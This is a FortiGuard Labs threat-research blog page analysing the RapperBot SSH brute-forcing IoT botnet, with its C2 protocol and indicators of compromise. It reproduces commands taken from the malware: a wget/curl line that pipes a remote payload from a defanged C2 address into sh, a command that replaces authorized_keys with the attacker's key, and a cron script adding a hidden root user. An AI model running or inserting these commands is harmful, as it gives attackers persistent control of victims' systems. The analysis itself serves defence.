
    <!DOCTYPE HTML>
    <html lang="en" data-template="post-page">
    <head>
        
    <meta charset="UTF-8"/>
    <title>So RapperBot, What Ya Bruting For? | FortiGuard Labs</title>
    <meta name="keywords" content="iot security,FortiGuard Labs,Threat Research,malware analysis,RapperBot"/>
    <meta name="description" content="FortiGuard Labs is tracking a rapidly evolving IoT malware family known as RapperBot. Read to learn how this threat infects and persists on a victim’s device."/>
    <meta name="template" content="post-page"/>
    

    <meta name="viewport" content="width=device-width, initial-scale=1"/>


<meta name="google-site-verification" content="tiQ03tSujT2TSsWJ6tNHiiUn8cwYVmdMQrGUCNrPQmo"/>

<meta property="og:site_name" content="Fortinet Blog"/>
<meta property="og:title" content="So RapperBot, What Ya Bruting For? | FortiGuard Labs"/>
<meta property="og:url" content="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="FortiGuard Labs is tracking a rapidly evolving IoT malware family known as RapperBot. Read to learn how this threat infects and persists on a victim’s device.…"/>
<meta property="og:image" content="https://www.fortinet.com/content/dam/fortinet-blog/article-images/rapperbot-discovery-hero.jpg"/>

<meta property="twitter:card" content="summary"/>
<meta property="twitter:site" content="@Fortinet"/>

<meta property="article:author" content="Joie Salvio and Roy Tay"/>

    <meta property="article:section" content="Threat Research"/>


    <meta property="article:published_time" content="2022-08-03T16:16:00.000-07:00"/>


    <meta property="article:tag" content="iot security"/>

    <meta property="article:tag" content="FortiGuard Labs"/>

    <meta property="article:tag" content="malware analysis"/>

    <meta property="article:tag" content="RapperBot"/>


<link rel="shortcut icon" href="/etc/designs/fortinet-blog/favicon.ico"/>
<link rel="canonical" href="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery"/>






     <link rel="stylesheet" href="/etc.clientlibs/fortinet-blog/clientlibs/clientlib-base.min.css?ver=071522" type="text/css"/>







    
    
    

    
    

    
    
    
    

    

    

    

    

    


        
            
            
                

            
        

    </head>
    <body>
    



    
<div class="root responsivegrid">


<div class="aem-Grid aem-Grid--12 aem-Grid--default--12 ">
    
<section class="b4-hero aem-GridColumn aem-GridColumn--default--12">



<div class="b4-hero__container" style="background-image:url(/content/dam/fortinet-blog/article-images/rapperbot-discovery-hero.jpg);">
    <img class="ratio" alt="So RapperBot, What Ya Bruting For? | FortiGuard Labs" aria-hidden="true" src=""/>
    <div class="b4-hero__text text-container">
        <p data-ly-test class="b4-hero__kicker">Threat Research</p>
        
        
        <h1 class="b4-hero__headline">So RapperBot, What Ya Bruting For?</h1>
        
    </div>
</div>
</section>
<section class="b15-blog-meta aem-GridColumn aem-GridColumn--default--12">

<div class="b15-blog-meta__container text-container">
    <span>By </span>

    <span class="b15-blog-meta__author">

        
					

                        

                                  
                                      
                                            
                                          
                                              <a href="/blog/search?author=Joie+Salvio">Joie Salvio</a> and
                                          
                                           
                                      
                                  
                          

                                  
                                      
                                            
                                              <a href="/blog/search?author=Roy+Tay">Roy Tay</a>
                                          
                                          
                                           
                                      
                                  
                          
                    
        
    </span>
    <span class="b15-blog-meta__">
        

              </span>



    <span class="b15-blog-meta__date"> | August 03, 2022</span>
</div>
</section>
<div class="responsivegrid aem-GridColumn aem-GridColumn--default--12">


<div class="aem-Grid aem-Grid--12 aem-Grid--default--12 ">
    
    <div class="raw-import aem-GridColumn aem-GridColumn--default--12">
<div class="text-container"></div>
</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>FortiGuard Labs has been tracking a rapidly evolving IoT malware family known as “RapperBot” since mid-June 2022. This family borrows heavily from the original Mirai source code, but what separates it from other IoT malware families is its built-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai.</p>
<p>In addition, recent samples show that its developers have started adding code to maintain persistence, which is rarely done in other Mirai variants. This provides threat actors with continued access to infected devices via SSH even after the device is rebooted or the malware has been removed.</p>
<p style="margin-left: 40.0px;"><b>Affected Platforms:</b> Linux<br />
<b>Impacted Users:</b> Any organization<br />
<b>Impact:</b> Remote attackers gain control of the vulnerable systems<br />
<b>Severity Level:</b> Critical</p>
<p>This article reveals how this threat infects and persists on a victim device, as well as interesting changes that make us question the real intention of the threat actors.</p>
<h2>Discovery</h2>
<p>In June 2022, FortiGuard Labs encountered IoT malware samples with SSH-related strings, something not often seen in other IoT threat campaigns. What piqued our interest more was the size of the code referencing these strings in relation to the code used for DDoS attacks, which usually comprises most of the code in other variants.</p>
<p>Upon further analysis, we discovered that this malware family, dubbed “RapperBot,” is designed to function primarily as an SSH brute forcer with limited DDoS capabilities. As is typical of most IoT malware, it targets ARM, MIPS, SPARC, and x86 architectures.</p>
<p>The name “RapperBot” comes from an early July report from <a href="https://www.ics-cert.org.cn/portal/page/112/1208496c5e164aceb8dadd08ab993dd2.html">CNCERT</a> where an embedded URL to a YouTube rap music video was found in older samples. The samples of RapperBot released after this report do not contain this URL.</p>
<h2>Hello From the Other Side</h2>
<p>RapperBot heavily reuses parts of the Mirai source code, but its features and implementation details, e.g., the Command &amp; Control (C2) command protocol, differ significantly from the original Mirai and from the typical Mirai-based variants monitored by FortiGuard Labs.</p>
<p>Unlike the majority of Mirai variants, which natively brute force Telnet servers using default or weak passwords, RapperBot exclusively scans and attempts to brute force SSH servers configured to accept password authentication. The bulk of the malware code contains an implementation of an SSH 2.0 client that can connect to and brute force any SSH server that supports Diffie-Hellman key exchange with 768-bit or 2048-bit keys and data encryption using AES128-CTR.</p>
<p>A distinctive feature of the brute forcing implementation in RapperBot is the use of “SSH-2.0-HELLOWORLD” to identify itself to the target SSH server during the SSH Protocol Exchange phase. The appearance of RapperBot in mid-June coincides with the observation of this same client identification string by <a href="https://isc.sans.edu/diary/Analysis+of+SSH+Honeypot+Data+with+PowerBI/28872">SANS Internet Storm Center</a> in their honeypot logs.</p>
<p>Earlier samples had the brute-forcing credential list hardcoded into the binary. From July onwards, samples retrieve this list from another port on the C2 server. This allows the threat actors to continually add new SSH credentials without having to update infected devices with new samples. This port number ranges from 4343 to 4345 in the latest samples.</p>
<p>Once RapperBot successfully brute forces an SSH server, the valid credentials are reported to the C2 server on a separate port (currently 48109) without executing further commands on the remote victim.</p>
<p>In late June, however, FortiGuard Labs found some samples that attempted to self-propagate via a remote binary downloader post-compromise. The commands executed on the compromised SSH server are shown below.</p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p style="margin-left: 40.0px;"><span style="font-size: 14.0px;"><span style="font-family: Consolas;"><span style="color: black;">sh</span></span><br />
 <span style="font-family: Consolas;"><span style="color: black;">enable</span></span><br />
 <span style="font-family: Consolas;"><span style="color: black;">shell</span></span><br />
 <span style="font-family: Consolas;"><span style="color: black;">debug shell</span></span><br />
 <span style="font-family: Consolas;"><span style="color: black;">cmd</span></span><br />
 <br />
 <span style="font-family: Consolas;"><span style="color: black;">wget http://2[.]58[.]149[.]116/w -O- | sh; curl http://2[.]58[.]149[.]116/c -O- |  sh</span></span></span></p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>For unknown reasons, this propagation functionality was removed in samples collected a few days later and has not been seen in subsequent samples. As with the original Mirai, we suspect the threat actors have implemented a separate loader system that would subsequently connect to the victim to download and execute the bot client.</p>
<h2>Never Gonna Give You Up</h2>
<p>Since mid-July, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH servers. It runs a shell command to replace remote victims’ ~/.ssh/authorized_keys with one containing the threat actors’ SSH public key with the comment “helloworld,” as shown below.</p>


</div>
<div class="raw-import aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--12 aem-GridColumn--offset--default--0">
<div class="text-container"><p style="margin-left:40px"><span style="font-size:14px"><span style="font-family:Calibri,sans-serif"><span style="font-family:Consolas"><span style="color:black">cd ~ &amp;&amp; rm -rf .ssh &amp;&amp; mkdir .ssh &amp;&amp; echo &quot;ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vs Hc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweY qTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1J FJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziis Zze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v 2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== helloworld&quot;&gt;&gt;.ssh/authorized_keys &amp;&amp; chmod -R go= ~/.ssh &amp;&amp; cd ~;</span></span></span></span></p>
</div>
</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
<p>Public keys stored in ~/.ssh/authorized_keys allow anyone with the corresponding private key to connect and authenticate to an SSH server without needing to supply a password. This presents a threat to compromised SSH servers, as threat actors can access them even after SSH credentials have been changed or SSH password authentication has been disabled. Moreover, since the file is replaced, all existing authorized keys are deleted, which prevents legitimate users from accessing the SSH server via public key authentication.</p>
<p>Apart from maintaining access to every SSH server that it brute forces, RapperBot is also very intent on retaining its foothold on any device on which it is executed. Samples from mid-July append the same aforementioned SSH key to the local &quot;~/.ssh/authorized_keys&quot; on the infected device upon execution. This allows RapperBot to maintain its access to these infected devices via SSH even after a device reboot or the removal of RapperBot from the device – something that is atypical of most Mirai variants. In an attempt to better hide in plain sight, the latest samples use a more innocuous comment &quot;system key generated by server 20220709&quot; for the public key instead of “helloworld.”</p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
<p>In the latest RapperBot samples, the malware also started adding the root user “suhelper” to the infected device by directly writing to “/etc/passwd” and “/etc/shadow”, further allowing the threat actor to take complete control of the device. In conjunction, it writes the following script to “/etc/cron.hourly/0” so that the root user account is re-added every hour, in the event that other users (or botnets) attempt to remove the account from the victim system. The command to add the root user is provided below.</p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;"><span style="color: black;">#!/bin/sh</span></span><br />
 <br />
 <span style="font-family: Consolas;"><span style="color: black;">useradd -u 0 -g 0 -o -d / suhelper -p '$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/' &gt;/dev/null 2&gt;&amp;1</span></span></span></span></p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>Figure 1 illustrates how the latest samples of RapperBot work. Dotted lines indicate potential actions that FortiGuard Labs assesses that the threat actor could perform but have not been observed in the wild.</p>


</div>
<div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2">

    
        <noscript data-cmp-image="{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}">
            <img src="/blog/threat-research/rapperbot-malware-discovery/_jcr_content/root/responsivegrid/image.img.png/1659483943925/fig1.png" alt="RapperBot execution flow"/>
        </noscript>
    
    <span class="cmp-image--title">Figure 1: RapperBot execution flow</span>


    

</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <h2>You Can’t See Me</h2>
<p>While early samples had strings in plaintext, subsequent samples added extra obfuscation to the strings by building them on the stack. This prevents common analysis tools and detection techniques from extracting human-readable strings from binary files (Figure 2).</p>


</div>
<div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2">

    
        <noscript data-cmp-image="{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}">
            <img src="/blog/threat-research/rapperbot-malware-discovery/_jcr_content/root/responsivegrid/image_415238308.img.png/1659483966370/fig2.png" alt="String encoding in RapperBot samples"/>
        </noscript>
    
    <span class="cmp-image--title">Figure 2: String encoding in RapperBot samples</span>


    

</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>Furthermore, these latest samples implemented an additional layer of Mirai-style XOR encoding to hide these strings from memory scanners during execution.</p>
<p>While most Mirai and Gafgyt botnet operators, like <a href="https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet">Keksec</a>, tend to include strings identifying themselves within the malware samples, the developers of this malware maintain a relatively low profile (apart from occasional references to rap music).</p>
<h2>Network Protocol</h2>
<p>RapperBot communicates with its C2 server via TCP requests at separate ports to receive commands (443 in the latest samples), download SSH credential lists, or report valid credentials during SSH brute forcing.</p>
<p>The network protocol for commands is explained in further detail below.</p>
<p>Each request contains a bot ID, a 32-byte value hardcoded in the binary. FortiGuard Labs observed two IDs as follows:</p>
<p style="margin-left: 40.0px;">d4 1c 74 44 70 95 28 ff f0 98 ae 4e 6f 92 ba d5 0f cd 56 29 c5 12 53 a1 fe 46 53 c7 0b b5 18 27</p>
<p style="margin-left: 40.0px;">f6 b7 0b 00 14 77 35 f9 8d 6d 5d c4 bd 23 88 7e cf 5e 02 ce 54 5f e7 b1 e6 3f 2a 16 71 b6 eb 9a (a separate cluster seen only in late December 2021)</p>
<p>As a side note, pivoting on these bot IDs allowed us to find older samples from November 2021. However, the SSH brute forcing capability was only seen in samples from mid-June 2022.</p>
<p>RapperBot starts by sending a registration packet to the C2 server. This includes the argument (referred to as “source” by Mirai) used when the binary was executed on the victim system, which usually provides some basic contextual information about its execution. For instance, “ssh.wget.arm7” would tell the C2 that the binary was spread via the SSH protocol, downloaded via the wget utility, and is of ARM architecture.</p>
<p>The succeeding communication uses the following structure:</p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">struct rapperbot_registration {</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    byte bot_id[32];</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    int command_code;</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    source [32];</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">};</span></span></span></p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>Here are the command codes supported by RapperBot:</p>
<ul>
<li><b>0x00</b>: Register (used by the client)</li>
<li><b>0x01</b>: Keep-Alive/Do nothing</li>
<li><b>0x02</b>: Stop all DoS attacks and terminate the client</li>
<li><b>0x03</b>: Perform a DoS attack</li>
<li><b>0x04</b>: Stop all DoS attacks</li>
</ul>
<p>Right after the registration packet, the client sends another request to notify the C2 that the client is ready to receive commands. The C2 server usually responds with a keep-alive command to acknowledge the request (Figure 3).</p>


</div>
<div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2">

    
        <noscript data-cmp-image="{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}">
            <img src="/blog/threat-research/rapperbot-malware-discovery/_jcr_content/root/responsivegrid/image_741407087.img.png/1659483997934/fig3.png" alt="RapperBot client-server communication"/>
        </noscript>
    
    <span class="cmp-image--title">Figure 3: RapperBot client-server communication</span>


    

</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>Besides the keep-alive command, we did not observe any other commands from the C2 server during our analysis.</p>
<p>However, RapperBot does support a very minimal set of DoS attacks, including plain UDP and TCP STOMP flood attacks that are very similar to Mirai’s implementation.</p>
<p>The attack command structure is as follows:</p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">struct rapperbot_attack_command {</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    byte bot_id[32];</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    int command_code;  // 0x03</span><br />
 <span style="font-family: Consolas;">    byte vector; // type of DoS attack</span><br />
 <span style="font-family: Consolas;">    ushort target_port;</span><br />
 <span style="font-family: Consolas;">    int duration;</span><br />
 <span style="font-family: Consolas;">    int target_ip;</span><br />
 <span style="font-family: Consolas;">};</span></span></span><br />
 </p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <h2>Mystery Motivation</h2>
<p>FortiGuard Labs has been monitoring this threat for over a month. During that time, it has undergone several interesting changes that raise more questions than answers when attempting to pinpoint the primary motivation of the threat actors in launching this campaign.</p>
<p>At one point, samples were observed where the DDoS attack capabilities were entirely removed and added back a week later. Could the DDoS functionality have been retained for masquerading as a typical DDoS botnet to avoid drawing too much attention? It is also possible that this whole campaign is still a work in progress.</p>
<p>Additionally, self-propagation was removed after a few days in late June, with the current focus on aggressively retaining continued access to brute-forced SSH servers. Are the threat actors more interested in collecting compromised SSH devices than expanding their botnet?</p>
<p>On top of that, we have not seen additional payloads delivered after brute forcing. We can only speculate on why the threat actors are amassing a rapidly growing collection of compromised SSH servers. Over 3,500 unique IPs have been observed in the past 1.5 months attempting to scan and brute-force SSH servers with the SSH-2.0-HELLOWORLD client identification string. IPs from the US, Taiwan, and South Korea comprised half of the observed IPs (Figure 4).</p>


</div>
<div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3">

    
        <noscript data-cmp-image="{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}">
            <img src="/blog/threat-research/rapperbot-malware-discovery/_jcr_content/root/responsivegrid/image_467426396.img.png/1659484018517/fig4.png" alt="Scanner IP Count from mid-June 2022 to late July 2022"/>
        </noscript>
    
    <span class="cmp-image--title">Figure 4: Scanner IP Count from mid-June 2022 to late July 2022</span>


    

</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
<h2>Conclusion</h2>
<p>Although this threat heavily borrows code from Mirai, it has features that set it apart from its predecessor and its variants. Its ability to persist on the victim system gives threat actors the flexibility to use the compromised devices for any malicious purpose they desire.</p>
<p>Due to some significant and curious changes that RapperBot has undergone, its primary motivation is still a bit of a mystery. Regardless, since its primary propagation method is brute forcing SSH credentials, this threat can easily be mitigated by setting strong passwords on devices or by disabling password authentication for SSH (where possible).</p>
<p>FortiGuard Labs will continue to monitor RapperBot’s development.</p>
<h2>Fortinet Protections</h2>
<p>Fortinet customers are protected by the following:</p>
<ul>
<li>The FortiGuard Antivirus service detects and blocks this threat as ELF/Mirai and Linux/Mirai.</li>
<li>The FortiGuard Web Filtering Service blocks the C2 servers and downloaded URLs.</li>
</ul>
<p><a href="https://www.fortinet.com/support/support-services/fortiguard-security-subscriptions/ipreputation-antibot">FortiGuard IP Reputation and Anti-Botnet Security Service</a> proactively blocks these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.</p>
<h2>IOCs</h2>
<h3>Files</h3>
<p>92ae77e9dd22e7680123bb230ce43ef602998e6a1c6756d9e2ce5822a09b37b4<br />
a31f4caa0be9e588056c92fd69c8ac970ebc7e85a68615b1d9407a954d4df45d<br />
e8d06ac196c7852ff71c150b2081150be9996ff670550717127db8ab855175a8<br />
23a415d0ec6d3131f1d537836d3c0449097e98167b18fbdbf2efca789748818a<br />
c83f318339e9c4072010b625d876558d14eaa0028339db9edf12bbcafe6828bb<br />
05c78eaf32af9647f178dff981e6e4e43b1579d95ccd4f1c2f1436dbfa0727ad<br />
88bbb772b8731296822646735aacbfb53014fbb7f90227b44523d7577e0a7ce6<br />
e8f1e8ec6b94ea54488d5f714e71e51d58dcdfe4be3827c55970d6f3b06edf73<br />
23256f231f3d91b0136b44d649b924552607a29b43a195024dbe6cde5b4a28ad<br />
77b2e5fb5b72493bde35a6b29a66e6250b6a5a0c9b9c5653957f64a12c793cd5<br />
dcdeedee4736ec528d1a30a585ec4a1a4f3462d6d25b71f6c1a4fef7f641e7ae<br />
ebb860512a55c1cdc8be1399eec44c4481aedb418f15dbda4612e6d38e9b9010<br />
9d234e975e4df539a217d1c4386822be1f56cea35f7dd2aa606ae4995894da42<br />
1975851c916587e057fa5862884cbac3fa1e80881ddd062392486f5390c86865<br />
8380321c1bd250424a0a167e0f319511611f73b53736895a8d3a2ad58ffcd5d5<br />
f5ff9d1261af176d7ff1ef91aa8c892c70b40caa02c17a25de22539e9d0cdd26<br />
2298071b6ba7baa5393be064876efcdbd9217c212e0c764ba62a6f0ffc83cc5a<br />
2479932a6690f070fa344e5222e3fbb6ad9c880294d5b822d7a3ec27f1b8b8d5<br />
1d5e6624a2ce55616ef078a72f25c9d71a3dbc0175522c0d8e07233115824f96<br />
746106403a98aea357b80f17910b641db9c4fedbb3968e75d836e8b1d5712a62<br />
ddf5aff0485f395c7e6c3de868b15212129962b4b9c8040bef6679ad880e3f31<br />
e56edaa1e06403757e6e2362383d41db4e4453aafda144bb36080a1f1b899a02<br />
55ff25b090dc1b380d8ca152428ba28ec14e9ef13a48b3fd162e965244b0d39b<br />
8e9f87bb25ff83e4ad970366bba47afb838028f7028ea3a7c73c4d08906ec102<br />
d86d158778a90f6633b41a10e169b25e3cb1eb35b369a9168ec64b2d8b3cbeec<br />
ff09cf7dfd1dc1466815d4df098065510eec504099ebb02b830309067031fe04</p>
<h3>Download URLs</h3>
<p>hxxp://31[.]44[.]185[.]235/x86<br />
hxxp://31[.]44[.]185[.]235/mips<br />
hxxp://31[.]44[.]185[.]235/arm7<br />
hxxp://2[.]58[.]149[.]116/arm<br />
hxxp://2[.]58[.]149[.]116/spc<br />
hxxp://2[.]58[.]149[.]116/mips<br />
hxxp://2[.]58[.]149[.]116/x86_64<br />
hxxp://2[.]58[.]149[.]116/ssh/arm7<br />
hxxp://2[.]58[.]149[.]116/ssh/mips<br />
hxxp://2[.]58[.]149[.]116/ssh/x86<br />
hxxp://2[.]58[.]149[.]116/ssh/spc<br />
hxxp://194[.]31[.]98[.]244/ssh/new/spc<br />
hxxp://194[.]31[.]98[.]244/ssh/new/x86<br />
hxxp://194[.]31[.]98[.]244/ssh/new/mips<br />
hxxp://194[.]31[.]98[.]244/ssh/new/arm7<br />
hxxp://194[.]31[.]98[.]244/ssh/new/arm<br />
hxxp://194[.]31[.]98[.]244/ssh/new/x86<br />
hxxp://194[.]31[.]98[.]244/ssh/new/mips<br />
hxxp://194[.]31[.]98[.]244/ssh/new/arm7<br />
hxxp://194[.]31[.]98[.]244/ssh/new/arm<br />
hxxp://185[.]225[.]73[.]196/ssh/new/arm<br />
hxxp://185[.]225[.]73[.]196/ssh/new/arm7<br />
hxxp://185[.]225[.]73[.]196/ssh/new/mips<br />
hxxp://185[.]225[.]73[.]196/ssh/new/x86<br />
</p>
<h3>C2</h3>
<p>31[.]44[.]185[.]235<br />
2[.]58[.]149[.]116<br />
194[.]31[.]98[.]244<br />
185[.]225[.]73[.]196<br />
</p>
<h3>Threat Actor SSH public key</h3>


</div>
<div class="raw-import aem-GridColumn aem-GridColumn--default--12">
<div class="text-container"><p><span style="font-size:14px"><span style="font-family:Consolas">AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJ
GGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30
NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1
giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLD
BAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==</span></span></p>
</div>
</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <h3>Threat Actor root user</h3>
<p><span style="font-size: 14.0px;"><span style="font-family: Consolas;">/etc/passwd suhelper:x:0:0::/:</span></span></p>
<p><span style="font-size: 14.0px;"><span style="font-family: Consolas;">/etc/shadow suhelper:$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/:19185:0:99999:7:::</span></span></p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p><i>Learn more about Fortinet’s <a href="https://www.fortinet.com/fortiguard/labs?utm_source=blog&amp;utm_campaign=fortiguard-labs">FortiGuard Labs</a> threat research and intelligence organization and the FortiGuard Security Subscriptions and Services <a href="https://www.fortinet.com/fortiguard/labs?tab=security-bundles&amp;utm_source=blog&amp;utm_campaign=security-bundles">portfolio</a>.</i></p>


</div>

    
</div>
</div>

    
</div>
</div>


    
    
    

    


    



    
        
    
    

    </body>
    </html>
